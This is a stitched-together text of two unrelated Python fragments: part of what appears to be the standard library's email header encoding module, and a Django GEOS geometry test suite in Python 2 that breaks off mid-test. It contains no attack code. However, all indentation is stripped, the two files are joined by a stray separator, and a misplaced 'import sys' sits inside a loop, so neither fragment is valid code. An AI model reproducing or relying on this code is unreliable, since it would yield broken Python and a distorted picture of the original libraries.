raise AssertionError('Unexpected encoding: ' + encoding)
# Now convert all words to bytes and collapse consecutive runs of
# similarly encoded words.
collapsed = []
last_word = last_charset = None
for word, charset in decoded_words:
if isinstance(word, str):
word = bytes(word, 'raw-unicode-escape')
if last_word is None:
last_word = word
last_charset = charset
elif charset != last_charset:
collapsed.append((last_word, last_charset))
last_word = word
last_charset = charset
elif last_charset is None:
last_word += BSPACE + word
else:
last_word += word
collapsed.append((last_word, last_charset))
return collapsed
def make_header(decoded_seq, maxlinelen=None, header_name=None,
continuation_ws=' '):
"""Create a Header from a sequence of pairs as returned by decode_header()
decode_header() takes a header value string and returns a sequence of
pairs of the format (decoded_string, charset) where charset is the string
name of the character set.
This function takes one of those sequence of pairs and returns a Header
instance. Optional maxlinelen, header_name, and continuation_ws are as in
the Header constructor.
"""
h = Header(maxlinelen=maxlinelen, header_name=header_name,
continuation_ws=continuation_ws)
for s, charset in decoded_seq:
# None means us-ascii but we can simply pass it on to h.append()
if charset is not None and not isinstance(charset, Charset):
charset = Charset(charset)
h.append(s, charset)
return h
class Header(object):
def __init__(self, s=None, charset=None,
maxlinelen=None, header_name=None,
continuation_ws=' ', errors='strict'):
"""Create a MIME-compliant header that can contain many character sets.
Optional s is the initial header value. If None, the initial header
value is not set. You can later append to the header with .append()
method calls. s may be a byte string or a Unicode string, but see the
.append() documentation for semantics.
Optional charset serves two purposes: it has the same meaning as the
charset argument to the .append() method. It also sets the default
character set for all subsequent .append() calls that omit the charset
argument. If charset is not provided in the constructor, the us-ascii
charset is used both as s's initial charset and as the default for
subsequent .append() calls.
The maximum line length can be specified explicitly via maxlinelen. For
splitting the first line to a shorter value (to account for the field
header which isn't included in s, e.g. `Subject') pass in the name of
the field in header_name. The default maxlinelen is 78 as recommended
by RFC 2822.
continuation_ws must be RFC 2822 compliant folding whitespace (usually
either a space or a hard tab) which will be prepended to continuation
lines.
errors is passed through to the .append() call.
"""
if charset is None:
charset = USASCII
elif not isinstance(charset, Charset):
charset = Charset(charset)
self._charset = charset
self._continuation_ws = continuation_ws
self._chunks = []
if s is not None:
self.append(s, charset, errors)
if maxlinelen is None:
maxlinelen = MAXLINELEN
self._maxlinelen = maxlinelen
if header_name is None:
self._headerlen = 0
else:
# Take the separating colon and space into account.
self._headerlen = len(header_name) + 2
def __str__(self):
"""Return the string value of the header."""
self._normalize()
uchunks = []
lastcs = None
lastspace = None
for string, charset in self._chunks:
# We must preserve spaces between encoded and non-encoded word
# boundaries, which means for us we need to add a space when we go
# from a charset to None/us-ascii, or from None/us-ascii to a
# charset. Only do this for the second and subsequent chunks.
# Don't add a space if the None/us-ascii string already has
# a space (trailing or leading depending on transition)
nextcs = charset
if nextcs == _charset.UNKNOWN8BIT:
original_bytes = string.encode('ascii', 'surrogateescape')
string = original_bytes.decode('ascii', 'replace')
if uchunks:
hasspace = string and self._nonctext(string[0])
if lastcs not in (None, 'us-ascii'):
if nextcs in (None, 'us-ascii') and not hasspace:
uchunks.append(SPACE)
nextcs = None
elif nextcs not in (None, 'us-ascii') and not lastspace:
uchunks.append(SPACE)
lastspace = string and self._nonctext(string[-1])
lastcs = nextcs
uchunks.append(string)
return EMPTYSTRING.join(uchunks)
# Rich comparison operators for equality only. BAW: does it make sense to
# have or explicitly disable <, <=, >, >= operators?
def __eq__(self, other):
# other may be a Header or a string. Both are fine so coerce
# ourselves to a unicode (of the unencoded header value), swap the
# args and do another comparison.
return other == str(self)
def __ne__(self, other):
return not self == other
def append(self, s, charset=None, errors='strict'):
"""Append a string to the MIME header.
Optional charset, if given, should be a Charset instance or the name
of a character set (which will be converted to a Charset instance). A
value of None (the default) means that the charset given in the
constructor is used.
s may be a byte string or a Unicode string. If it is a byte string
(i.e. isinstance(s, str) is false), then charset is the encoding of
that byte string, and a UnicodeError will be raised if the string
cannot be decoded with that charset. If s is a Unicode string, then
charset is a hint specifying the character set of the characters in
the string. In either case, when producing an RFC 2822 compliant
header using RFC 2047 rules, the string will be encoded using the
output codec of the charset. If the string cannot be encoded to the
output codec, a UnicodeError will be raised.
Optional `errors' is passed as the errors argument to the decode
call if s is a byte string.
"""
if charset is None:
charset = self._charset
elif not isinstance(charset, Charset):
charset = Charset(charset)
if not isinstance(s, str):
input_charset = charset.input_codec or 'us-ascii'
if input_charset == _charset.UNKNOWN8BIT:
s = s.decode('us-ascii', 'surrogateescape')
else:
s = s.decode(input_charset, errors)
# Ensure that the bytes we're storing can be decoded to the output
# character set, otherwise an early error is raised.
output_charset = charset.output_codec or 'us-ascii'
if output_charset != _charset.UNKNOWN8BIT:
try:
s.encode(output_charset, errors)
except UnicodeEncodeError:
if output_charset != 'us-ascii':
raise
charset = UTF8
self._chunks.append((s, charset))
def _nonctext(self, s):
"""True if string s is not a ctext character of RFC822.
"""
return s.isspace() or s in ('(', ')', '\\')
def encode(self, splitchars=';, \t', maxlinelen=None, linesep='\n'):
r"""Encode a message header into an RFC-compliant format.
There are many issues involved in converting a given string for use in
an email header. Only certain character sets are readable in most
email clients, and as header strings can only contain a subset of
7-bit ASCII, care must be taken to properly convert and encode (with
Base64 or quoted-printable) header strings. In addition, there is a
75-character length limit on any given encoded header field, so
line-wrapping must be performed, even with double-byte character sets.
Optional maxlinelen specifies the maximum length of each generated
line, exclusive of the linesep string. Individual lines may be longer
than maxlinelen if a folding point cannot be found. The first line
will be shorter by the length of the header name plus ": " if a header
name was specified at Header construction time. The default value for
maxlinelen is determined at header construction time.
Optional splitchars is a string containing characters which should be
given extra weight by the splitting algorithm during normal header
wrapping. This is in very rough support of RFC 2822's `higher level
syntactic breaks': split points preceded by a splitchar are preferred
during line splitting, with the characters preferred in the order in
which they appear in the string. Space and tab may be included in the
string to indicate whether preference should be given to one over the
other as a split point when other split chars do not appear in the line
being split. Splitchars does not affect RFC 2047 encoded lines.
Optional linesep is a string to be used to separate the lines of
the value. The default value is the most useful for typical
Python applications, but it can be set to \r\n to produce RFC-compliant
line separators when needed.
"""
self._normalize()
if maxlinelen is None:
maxlinelen = self._maxlinelen
# A maxlinelen of 0 means don't wrap. For all practical purposes,
# choosing a huge number here accomplishes that and makes the
# _ValueFormatter algorithm much simpler.
if maxlinelen == 0:
maxlinelen = 1000000
formatter = _ValueFormatter(self._headerlen, maxlinelen,
self._continuation_ws, splitchars)
lastcs = None
hasspace = lastspace = None
for string, charset in self._chunks:
if hasspace is not None:
hasspace = string and self._nonctext(string[0])
import sys
if lastcs not in (None, 'us-ascii'):
if not hasspace or charset not in (None, 'us-ascii'):
formatter.add_transition()
elif charset not in (None, 'us-ascii') and not lastspace:
formatter.add_transition()
lastspace = string and self._nonctext(string[-1])
lastcs = charset
hasspace = False
lines = string.splitlines()
if lines:
formatter.feed('', lines[0], charset)
else:
formatter.feed('', '', charset)
for line in lines[1:]:
formatter.newline()
if charset.header_encoding is not None:
formatter.feed(self._continuation_ws, ' ' + line.lstrip(),
charset)
else:
sline = line.lstrip()
fws = line[:len(line) - len(sline)]
formatter.feed(fws, sline, charset)
if len(lines) > 1:
formatter.newline()
if self._chunks:
formatter.add_transition()
value = formatter._str(linesep)
if _embeded_header.search(value):
raise HeaderParseError("header value appears to contain "
"an embedded header: {!r}".format(value))
return value
def _normalize(self):
# Step 1: Normalize the chunks so that all runs of identical charsets
# get collapsed into a single unicode string.
chunks = []
last_charset = None
last_chunk = []
for string, charset in self._chunks:
if charset == last_charset:
last_chunk.append(string)
else:
if last_charset is not None:
chunks.append((SPACE.join(last_chunk), last_charset))
last_chunk = [string]
last_charset = charset
if last_chunk:
chunks.append((SPACE.join(last_chunk), last_charset))
self._chunks = chunks
class _ValueFormatter(object):
def __init__(self, headerlen, maxlen, continuation_ws, splitchars):
self._maxlen = maxlen
self._continuation_ws = continuation_ws
self._continuation_ws_len = len(continuation_ws)
self._splitchars = splitchars
self._lines = []
self._current_line = _Accumulator(headerlen)
def _str(self, linesep):
self.newline()
return linesep.join(self._lines)
def __str__(self):
return self._str(NL)
def newline(self):
end_of_line = self._current_line.pop()
if end_of_line != (' ', ''):
self._current_line.push(*end_of_line)
if len(self._current_line) > 0:
if self._current_line.is_onlyws():
self._lines[-1] += str(self._current_line)
else:
self._lines.append(str(self._current_line))
self._current_line.reset()
def add_transition(self):
self._current_line.push(' ', '')
def feed(self, fws, string, charset):
# If the charset has no header encoding (i.e. it is an ASCII encoding)
# then we must split the header at the "highest level syntactic break"
# possible. Note that we don't have a lot of smarts about field
# syntax; we just try to break on semi-colons, then commas, then
# whitespace. Eventually, this should be pluggable.
if charset.header_encoding is None:
self._ascii_split(fws, string, self._splitchars)
return
# Otherwise, we're doing either a Base64 or a quoted-printable
# encoding which means we don't need to split the line on syntactic
# breaks. We can basically just find enough characters to fit on the
# current line, minus the RFC 2047 chrome. What makes this trickier
# though is that we have to split at octet boundaries, not character
# boundaries but it's only safe to split at character boundaries so at
# best we can only get close.
encoded_lines = charset.header_encode_lines(string, self._maxlengths())
# The first element extends the current line, but if it's None then
# nothing more fit on the current line so start a new line.
try:
first_line = encoded_lines.pop(0)
except IndexError:
# There are no encoded lines, so we're done.
return
if first_line is not None:
self._append_chunk(fws, first_line)
try:
last_line = encoded_lines.pop()
except IndexError:
# There was only one line.
return
self.newline()
self._current_line.push(self._continuation_ws, last_line)
# Everything else are full lines in themselves.
for line in encoded_lines:
self._lines.append(self._continuation_ws + line)
def _maxlengths(self):
# The first line's length.
yield self._maxlen - len(self._current_line)
while True:
yield self._maxlen - self._continuation_ws_len
def _ascii_split(self, fws, string, splitchars):
# The RFC 2822 header folding algorithm is simple in principle but
# complex in practice. Lines may be folded any place where "folding
# white space" appears by inserting a linesep character in front of the
# FWS. The complication is that not all spaces or tabs qualify as FWS,
# and we are also supposed to prefer to break at "higher level
# syntactic breaks". We can't do either of these without intimate
# knowledge of the structure of structured headers, which we don't have
# here. So the best we can do here is prefer to break at the specified
# splitchars, and hope that we don't choose any spaces or tabs that
# aren't legal FWS. (This is at least better than the old algorithm,
# where we would sometimes *introduce* FWS after a splitchar, or the
# algorithm before that, where we would turn all white space runs into
# single spaces or tabs.)
parts = re.split("([" + FWS + "]+)", fws + string)
if parts[0]:
parts[:0] = ['']
else:
parts.pop(0)
for fws, part in zip(*[iter(parts)] * 2):
self._append_chunk(fws, part)
def _append_chunk(self, fws, string):
self._current_line.push(fws, string)
if len(self._current_line) > self._maxlen:
# Find the best split point, working backward from the end.
# There might be none, on a long first line.
for ch in self._splitchars:
for i in range(self._current_line.part_count() - 1, 0, -1):
if ch.isspace():
fws = self._current_line[i][0]
if fws and fws[0] == ch:
break
prevpart = self._current_line[i - 1][1]
if prevpart and prevpart[-1] == ch:
break
else:
continue
break
else:
fws, part = self._current_line.pop()
if self._current_line._initial_size > 0:
# There will be a header, so leave it on a line by itself.
self.newline()
if not fws:
# We don't use continuation_ws here because the whitespace
# after a header should always be a space.
fws = ' '
self._current_line.push(fws, part)
return
remainder = self._current_line.pop_from(i)
self._lines.append(str(self._current_line))
self._current_line.reset(remainder)
class _Accumulator(list):
def __init__(self, initial_size=0):
self._initial_size = initial_size
super().__init__()
def push(self, fws, string):
self.append((fws, string))
def pop_from(self, i=0):
popped = self[i:]
self[i:] = []
return popped
def pop(self):
if self.part_count() == 0:
return ('', '')
return super().pop()
def __len__(self):
return sum((len(fws) + len(part) for fws, part in self),
self._initial_size)
def __str__(self):
return EMPTYSTRING.join((EMPTYSTRING.join((fws, part))
for fws, part in self))
def reset(self, startval=None):
if startval is None:
startval = []
self[:] = startval
self._initial_size = 0
def is_onlyws(self):
return self._initial_size == 0 and (not self or str(self).isspace())
def part_count(self):
return super().__len__()
| |
import ctypes, random, unittest, sys
from django.contrib.gis.geos import *
from django.contrib.gis.geos.base import gdal, numpy, GEOSBase
from django.contrib.gis.tests.geometries import *
class GEOSTest(unittest.TestCase):
@property
def null_srid(self):
"""
Returns the proper null SRID depending on the GEOS version.
See the comments in `test15_srid` for more details.
"""
info = geos_version_info()
if info['version'] == '3.0.0' and info['release_candidate']:
return -1
else:
return None
def test00_base(self):
"Tests out the GEOSBase class."
# Testing out GEOSBase class, which provides a `ptr` property
# that abstracts out access to underlying C pointers.
class FakeGeom1(GEOSBase):
pass
# This one only accepts pointers to floats
c_float_p = ctypes.POINTER(ctypes.c_float)
class FakeGeom2(GEOSBase):
ptr_type = c_float_p
# Default ptr_type is `c_void_p`.
fg1 = FakeGeom1()
# Default ptr_type is C float pointer
fg2 = FakeGeom2()
# These assignments are OK -- None is allowed because
# it's equivalent to the NULL pointer.
fg1.ptr = ctypes.c_void_p()
fg1.ptr = None
fg2.ptr = c_float_p(ctypes.c_float(5.23))
fg2.ptr = None
# Because pointers have been set to NULL, an exception should be
# raised when we try to access it. Raising an exception is
# preferrable to a segmentation fault that commonly occurs when
# a C method is given a NULL memory reference.
for fg in (fg1, fg2):
# Equivalent to `fg.ptr`
self.assertRaises(GEOSException, fg._get_ptr)
# Anything that is either not None or the acceptable pointer type will
# result in a TypeError when trying to assign it to the `ptr` property.
# Thus, memmory addresses (integers) and pointers of the incorrect type
# (in `bad_ptrs`) will not be allowed.
bad_ptrs = (5, ctypes.c_char_p('foobar'))
for bad_ptr in bad_ptrs:
# Equivalent to `fg.ptr = bad_ptr`
self.assertRaises(TypeError, fg1._set_ptr, bad_ptr)
self.assertRaises(TypeError, fg2._set_ptr, bad_ptr)
def test01a_wkt(self):
"Testing WKT output."
for g in wkt_out:
geom = fromstr(g.wkt)
self.assertEqual(g.ewkt, geom.wkt)
def test01b_hex(self):
"Testing HEX output."
for g in hex_wkt:
geom = fromstr(g.wkt)
self.assertEqual(g.hex, geom.hex)
def test01b_hexewkb(self):
"Testing (HEX)EWKB output."
from binascii import a2b_hex
pnt_2d = Point(0, 1, srid=4326)
pnt_3d = Point(0, 1, 2, srid=4326)
# OGC-compliant HEX will not have SRID nor Z value.
self.assertEqual(ogc_hex, pnt_2d.hex)
self.assertEqual(ogc_hex, pnt_3d.hex)
# HEXEWKB should be appropriate for its dimension -- have to use an
# a WKBWriter w/dimension set accordingly, else GEOS will insert
# garbage into 3D coordinate if there is none. Also, GEOS has a
# a bug in versions prior to 3.1 that puts the X coordinate in
# place of Z; an exception should be raised on those versions.
self.assertEqual(hexewkb_2d, pnt_2d.hexewkb)
if GEOS_PREPARE:
self.assertEqual(hexewkb_3d, pnt_3d.hexewkb)
self.assertEqual(True, GEOSGeometry(hexewkb_3d).hasz)
else:
try:
hexewkb = pnt_3d.hexewkb
except GEOSException:
pass
else:
self.fail('Should have raised GEOSException.')
# Same for EWKB.
self.assertEqual(buffer(a2b_hex(hexewkb_2d)), pnt_2d.ewkb)
if GEOS_PREPARE:
self.assertEqual(buffer(a2b_hex(hexewkb_3d)), pnt_3d.ewkb)
else:
try:
ewkb = pnt_3d.ewkb
except GEOSException:
pass
else:
self.fail('Should have raised GEOSException')
# Redundant sanity check.
self.assertEqual(4326, GEOSGeometry(hexewkb_2d).srid)
def test01c_kml(self):
"Testing KML output."
for tg in wkt_out:
geom = fromstr(tg.wkt)
kml = getattr(tg, 'kml', False)
if kml: self.assertEqual(kml, geom.kml)
def test01d_errors(self):
"Testing the Error handlers."
# string-based
print "\nBEGIN - expecting GEOS_ERROR; safe to ignore.\n"
for err in errors:
try:
g = fromstr(err.wkt)
except (GEOSException, ValueError):
pass
# Bad WKB
self.assertRaises(GEOSException, GEOSGeometry, buffer('0'))
print "\nEND - expecting GEOS_ERROR; safe to ignore.\n"
class NotAGeometry(object):
pass
# Some other object
self.assertRaises(TypeError, GEOSGeometry, NotAGeometry())
# None
self.assertRaises(TypeError, GEOSGeometry, None)
def test01e_wkb(self):
"Testing WKB output."
from binascii import b2a_hex
for g in hex_wkt:
geom = fromstr(g.wkt)
wkb = geom.wkb
self.assertEqual(b2a_hex(wkb).upper(), g.hex)
def test01f_create_hex(self):
"Testing creation from HEX."
for g in hex_wkt:
geom_h = GEOSGeometry(g.hex)
# we need to do this so decimal places get normalised
geom_t = fromstr(g.wkt)
self.assertEqual(geom_t.wkt, geom_h.wkt)
def test01g_create_wkb(self):
"Testing creation from WKB."
from binascii import a2b_hex
for g in hex_wkt:
wkb = buffer(a2b_hex(g.hex))
geom_h = GEOSGeometry(wkb)
# we need to do this so decimal places get normalised
geom_t = fromstr(g.wkt)
self.assertEqual(geom_t.wkt, geom_h.wkt)
def test01h_ewkt(self):
"Testing EWKT."
srid = 32140
for p in polygons:
ewkt = 'SRID=%d;%s' % (srid, p.wkt)
poly = fromstr(ewkt)
self.assertEqual(srid, poly.srid)
self.assertEqual(srid, poly.shell.srid)
self.assertEqual(srid, fromstr(poly.ewkt).srid) # Checking export
def test01i_json(self):
"Testing GeoJSON input/output (via GDAL)."
if not gdal or not gdal.GEOJSON: return
for g in json_geoms:
geom = GEOSGeometry(g.wkt)
if not hasattr(g, 'not_equal'):
self.assertEqual(g.json, geom.json)
self.assertEqual(g.json, geom.geojson)
self.assertEqual(GEOSGeometry(g.wkt), GEOSGeometry(geom.json))
def test01k_fromfile(self):
"Testing the fromfile() factory."
from StringIO import StringIO
ref_pnt = GEOSGeometry('POINT(5 23)')
wkt_f = StringIO()
wkt_f.write(ref_pnt.wkt)
wkb_f = StringIO()
wkb_f.write(str(ref_pnt.wkb))
# Other tests use `fromfile()` on string filenames so those
# aren't tested here.
for fh in (wkt_f, wkb_f):
fh.seek(0)
pnt = fromfile(fh)
self.assertEqual(ref_pnt, pnt)
def test01k_eq(self):
"Testing equivalence."
p = fromstr('POINT(5 23)')
self.assertEqual(p, p.wkt)
self.assertNotEqual(p, 'foo')
ls = fromstr('LINESTRING(0 0, 1 1, 5 5)')
self.assertEqual(ls, ls.wkt)
self.assertNotEqual(p, 'bar')
# Error shouldn't be raise on equivalence testing with
# an invalid type.
for g in (p, ls):
self.assertNotEqual(g, None)
self.assertNotEqual(g, {'foo' : 'bar'})
self.assertNotEqual(g, False)
def test02a_points(self):
"Testing Point objects."
prev = fromstr('POINT(0 0)')
for p in points:
# Creating the point from the WKT
pnt = fromstr(p.wkt)
self.assertEqual(pnt.geom_type, 'Point')
self.assertEqual(pnt.geom_typeid, 0)
self.assertEqual(p.x, pnt.x)
self.assertEqual(p.y, pnt.y)
self.assertEqual(True, pnt == fromstr(p.wkt))
self.assertEqual(False, pnt == prev)
# Making sure that the point's X, Y components are what we expect
self.assertAlmostEqual(p.x, pnt.tuple[0], 9)
self.assertAlmostEqual(p.y, pnt.tuple[1], 9)
# Testing the third dimension, and getting the tuple arguments
if hasattr(p, 'z'):
self.assertEqual(True, pnt.hasz)
self.assertEqual(p.z, pnt.z)
self.assertEqual(p.z, pnt.tuple[2], 9)
tup_args = (p.x, p.y, p.z)
set_tup1 = (2.71, 3.14, 5.23)
set_tup2 = (5.23, 2.71, 3.14)
else:
self.assertEqual(False, pnt.hasz)
self.assertEqual(None, pnt.z)
tup_args = (p.x, p.y)
set_tup1 = (2.71, 3.14)
set_tup2 = (3.14, 2.71)
# Centroid operation on point should be point itself
self.assertEqual(p.centroid, pnt.centroid.tuple)
# Now testing the different constructors
pnt2 = Point(tup_args) # e.g., Point((1, 2))
pnt3 = Point(*tup_args) # e.g., Point(1, 2)
self.assertEqual(True, pnt == pnt2)
self.assertEqual(True, pnt == pnt3)
# Now testing setting the x and y
pnt.y = 3.14
pnt.x = 2.71
self.assertEqual(3.14, pnt.y)
self.assertEqual(2.71, pnt.x)
# Setting via the tuple/coords property
pnt.tuple = set_tup1
self.assertEqual(set_tup1, pnt.tuple)
pnt.coords = set_tup2
self.assertEqual(set_tup2, pnt.coords)
prev = pnt # setting the previous geometry
def test02b_multipoints(self):
"Testing MultiPoint objects."
for mp in multipoints:
mpnt = fromstr(mp.wkt)
self.assertEqual(mpnt.geom_type, 'MultiPoint')
self.assertEqual(mpnt.geom_typeid, 4)
self.assertAlmostEqual(mp.centroid[0], mpnt.centroid.tuple[0], 9)
self.assertAlmostEqual(mp.centroid[1], mpnt.centroid.tuple[1], 9)
self.assertRaises(GEOSIndexError, mpnt.__getitem__, len(mpnt))
self.assertEqual(mp.centroid, mpnt.centroid.tuple)
self.assertEqual(mp.points, tuple(m.tuple for m in mpnt))
for p in mpnt:
self.assertEqual(p.geom_type, 'Point')
self.assertEqual(p.geom_typeid, 0)
self.assertEqual(p.empty, False)
self.assertEqual(p.valid, True)
def test03a_linestring(self):
"Testing LineString objects."
prev = fromstr('POINT(0 0)')
for l in linestrings:
ls = fromstr(l.wkt)
self.assertEqual(ls.geom_type, 'LineString')
self.assertEqual(ls.geom_typeid, 1)
self.assertEqual(ls.empty, False)
self.assertEqual(ls.ring, False)
if hasattr(l, 'centroid'):
self.assertEqual(l.centroid, ls.centroid.tuple)
if hasattr(l, 'tup'):
self.assertEqual(l.tup, ls.tuple)
self.assertEqual(True, ls == fromstr(l.wkt))
self.assertEqual(False, ls == prev)
self.assertRaises(GEOSIndexError, ls.__getitem__, len(ls))
prev = ls
# Creating a LineString from a tuple, list, and numpy array
self.assertEqual(ls, LineString(ls.tuple)) # tuple
self.assertEqual(ls, LineString(*ls.tuple)) # as individual arguments
self.assertEqual(ls, LineString([list(tup) for tup in ls.tuple])) # as list
self.assertEqual(ls.wkt, LineString(*tuple(Point(tup) for tup in ls.tuple)).wkt) # Point individual arguments
if numpy: self.assertEqual(ls, LineString(numpy.array(ls.tuple))) # as numpy array
def test03b_multilinestring(self):
"Testing MultiLineString objects."
prev = fromstr('POINT(0 0)')
for l in multilinestrings:
ml = fromstr(l.wkt)
self.assertEqual(ml.geom_type, 'MultiLineString')
self.assertEqual(ml.geom_typeid, 5)
self.assertAlmostEqual(l.centroid[0], ml.centroid.x, 9)
self.assertAlmostEqual(l.centroid[1], ml.centroid.y, 9)
self.assertEqual(True, ml == fromstr(l.wkt))
self.assertEqual(False, ml == prev)
prev = ml
for ls in ml:
self.assertEqual(ls.geom_type, 'LineString')
self.assertEqual(ls.geom_typeid, 1)
self.assertEqual(ls.empty, False)
self.assertRaises(GEOSIndexError, ml.__getitem__, len(ml))
self.assertEqual(ml.wkt, MultiLineString(*tuple(s.clone() for s in ml)).wkt)
self.assertEqual(ml, MultiLineString(*tuple(LineString(s.tuple) for s in ml)))
def test04_linearring(self):
"Testing LinearRing objects."
for rr in linearrings:
lr = fromstr(rr.wkt)
self.assertEqual(lr.geom_type, 'LinearRing')
self.assertEqual(lr.geom_typeid, 2)
self.assertEqual(rr.n_p, len(lr))
self.assertEqual(True, lr.valid)
self.assertEqual(False, lr.empty)
# Creating a LinearRing from a tuple, list, and numpy array
self.assertEqual(lr, LinearRing(lr.tuple))
self.assertEqual(lr, LinearRing(*lr.tuple))
self.assertEqual(lr, LinearRing([list(tup) for tup in lr.tuple]))
if numpy: self.assertEqual(lr, LinearRing(numpy.array(lr.tuple)))
def test05a_polygons(self):
"Testing Polygon objects."
# Testing `from_bbox` class method
bbox = (-180, -90, 180, 90)
p = Polygon.from_bbox( bbox )
self.assertEqual(bbox, p.extent)
prev = fromstr('POINT(0 0)')
for p in polygons:
# Creating the Polygon, testing its properties.
poly = fromstr(p.wkt)
self.assertEqual(poly.geom_type, 'Polygon')
self.assertEqual(poly.geom_typeid, 3)
self.assertEqual(poly.empty, False)
self.assertEqual(poly.ring, False)
self.assertEqual(p.n_i, poly.num_interior_rings)
self.assertEqual(p.n_i + 1, len(poly)) # Testing __len__
self.assertEqual(p.n_p, poly.num_points)
# Area & Centroid
self.assertAlmostEqual(p.area, poly.area, 9)
self.assertAlmostEqual(p.centroid[0], poly.centroid.tuple[0], 9)
self.assertAlmostEqual(p.centroid[1], poly.centroid.tuple[1], 9)
# Testing the geometry equivalence
self.assertEqual(True, poly == fromstr(p.wkt))
self.assertEqual(False, poly == prev) # Should not be equal to previous geometry
self.assertEqual(True, poly != prev)
# Testing the exterior ring
ring = poly.exterior_ring
self.assertEqual(ring.geom_type, 'LinearRing')
self.assertEqual(ring.geom_typeid, 2)
if p.ext_ring_cs:
self.assertEqual(p.ext_ring_cs, ring.tuple)
self.assertEqual(p.ext_ring_cs, poly[0].tuple) # Testing __getitem__
# Testing __getitem__ and __setitem__ on invalid indices
self.assertRaises(GEOSIndexError, poly.__getitem__, len(poly))
self.assertRaises(GEOSIndexError, poly.__setitem__, len(poly), False)
self.assertRaises(GEOSIndexError, poly.__getitem__, -1 * len(poly) - 1)
# Testing __iter__
for r in poly:
self.assertEqual(r.geom_type, 'LinearRing')
self.assertEqual(r.geom_typeid, 2)
# Testing polygon construction.
self.assertRaises(TypeError, Polygon.__init__, 0, [1, 2, 3])
self.assertRaises(TypeError, Polygon.__init__, 'foo')
# Polygon(shell, (hole1, ... holeN))
rings = tuple(r for r in poly)
self.assertEqual(poly, Polygon(rings[0], rings[1:]))
# Polygon(shell_tuple, hole_tuple1, ... , hole_tupleN)
ring_tuples = tuple(r.tuple for r in poly)
self.assertEqual(poly, Polygon(*ring_tuples))
# Constructing with tuples of LinearRings.
self.assertEqual(poly.wkt, Polygon(*tuple(r for r in poly)).wkt)
self.assertEqual(poly.wkt, Polygon(*tuple(LinearRing(r.tuple) for r in poly)).wkt)
def test05b_multipolygons(self):
"Testing MultiPolygon objects."
print "\nBEGIN - expecting GEOS_NOTICE; safe to ignore.\n"
prev = fromstr('POINT (0 0)')
for mp in multipolygons:
mpoly = fromstr(mp.wkt)
self.assertEqual(mpoly.geom_type, 'MultiPolygon')
self.assertEqual(mpoly.geom_typeid, 6)
self.assertEqual(mp.valid, mpoly.valid)
if mp.valid:
self.assertEqual(mp.num_geom, mpoly.num_geom)
self.assertEqual(mp.n_p, mpoly.num_coords)
self.assertEqual(mp.num_geom, len(mpoly))
self.assertRaises(GEOSIndexError, mpoly.__getitem__, len(mpoly))
for p in mpoly:
self.assertEqual(p.geom_type, 'Polygon')
self.assertEqual(p.geom_typeid, 3)
self.assertEqual(p.valid, True)
self.assertEqual(mpoly.wkt, MultiPolygon(*tuple(poly.clone() for poly in mpoly)).wkt)
print "\nEND - expecting GEOS_NOTICE; safe to ignore.\n"
def test06a_memory_hijinks(self):
"Testing Geometry __del__() on rings and polygons."
#### Memory issues with rings and polygons
# These tests are needed to ensure sanity with writable geometries.
# Getting a polygon with interior rings, and pulling out the interior rings
poly = fromstr(polygons[1].wkt)
ring1 = poly[0]
ring2 = poly[1]
# These deletes should be 'harmless' since they are done on child geometries
del ring1
del ring2
ring1 = poly[0]
ring2 = poly[1]
# Deleting the polygon
del poly
# Access to these rings is OK since they are clones.
s1, s2 = str(ring1), str(ring2)
# The previous hijinks tests are now moot because only clones are
# now used =)
def test08_coord_seq(self):
"Testing Coordinate Sequence objects."
for p in polygons:
if p.ext_ring_cs:
# Constructing the polygon and getting the coordinate sequence
poly = fromstr(p.wkt)
cs = poly.exterior_ring.coord_seq
self.assertEqual(p.ext_ring_cs, cs.tuple) # done in the Polygon test too.
self.assertEqual(len(p.ext_ring_cs), len(cs)) # Making sure __len__ works
# Checks __getitem__ and __setitem__
for i in xrange(len(p.ext_ring_cs)):
c1 = p.ext_ring_cs[i] # Expected value
c2 = cs[i] # Value from coordseq
self.assertEqual(c1, c2)
# Constructing the test value to set the coordinate sequence with
if len(c1) == 2: tset = (5, 23)
else: tset = (5, 23, 8)
cs[i] = tset
# Making sure every set point matches what we expect
for j in range(len(tset)):
cs[i] = tset
self.assertEqual(tset[j], cs[i][j])
def test09_relate_pattern(self):
"Testing relate() and relate_pattern()."
g = fromstr('POINT (0 0)')
self.assertRaises(GEOSException, g.relate_pattern, 0, 'invalid pattern, yo')
for i in xrange(len(relate_geoms)):
g_tup = relate_geoms[i]
a = fromstr(g_tup[0].wkt)
b = fromstr(g_tup[1].wkt)
pat = g_tup[2]
result = g_tup[3]
self.assertEqual(result, a.relate_pattern(b, pat))
self.assertEqual(pat, a.relate(b))
def test10_intersection(self):
"Testing intersects() and intersection()."
for i in xrange(len(topology_geoms)):
g_tup = topology_geoms[i]
a = fromstr(g_tup[0].wkt)
b = fromstr(g_tup[1].wkt)
i1 = fromstr(intersect_geoms[i].wkt)
self.assertEqual(True, a.intersects(b))
i2 = a.intersection(b)
self.assertEqual(i1, i2)
self.assertEqual(i1, a & b) # __and__ is intersection operator
a &= b # testing __iand__
self.assertEqual(i1, a)
def test11_union(self):
"Testing union()."
for i in xrange(len(topology_geoms)):
g_tup = topology_geoms[i]
a = fromstr(g_tup[0].wkt)
b = fromstr(g_tup[1].wkt)
u1 = fromstr(union_geoms[i].wkt)
u2 = a.union(b)
self.assertEqual(u1, u2)
self.assertEqual(u1, a | b) # __or__ is union operator
a |= b # testing __ior__
self.assertEqual(u1, a)
def test12_difference(self):
"Testing difference()."
for i in xrange(len(topology_geoms)):
g_tup = topology_geoms[i]
a = fromstr(g_tup[0].wkt)
b = fromstr(g_tup[1].wkt)
d1 = fromstr(diff_geoms[i].wkt)
d2 = a.difference(b)
self.assertEqual(d1, d2)
self.assertEqual(d1, a - b) # __sub__ is difference operator
a -= b # testing __isub__
self.assertEqual(d1, a)
def test13_symdifference(self):
"Testing sym_difference()."
for i in xrange(len(topology_geoms)):
g_tup = topology_geoms[i]
a = fromstr(g_tup[0].wkt)
b = fromstr(g_tup[1].wkt)
d1 = fromstr(sdiff_geoms[i].wkt)
d2 = a.sym_difference(b)
self.assertEqual(d1, d2)
self.assertEqual(d1, a ^ b) # __xor__ is symmetric difference operator
a ^= b # testing __ixor__
self.assertEqual(d1, a)
def test14_buffer(self):
"Testing buffer()."
for i in xrange(len(buffer_geoms)):
g_tup = buffer_geoms[i]
g = fromstr(g_tup[0].wkt)
# The buffer we expect
exp_buf = fromstr(g_tup[1].wkt)
# Can't use a floating-point for the number of quadsegs.
self.assertRaises(ctypes.ArgumentError, g.buffer, g_tup[2], float(g_tup[3]))
# Constructing our buffer
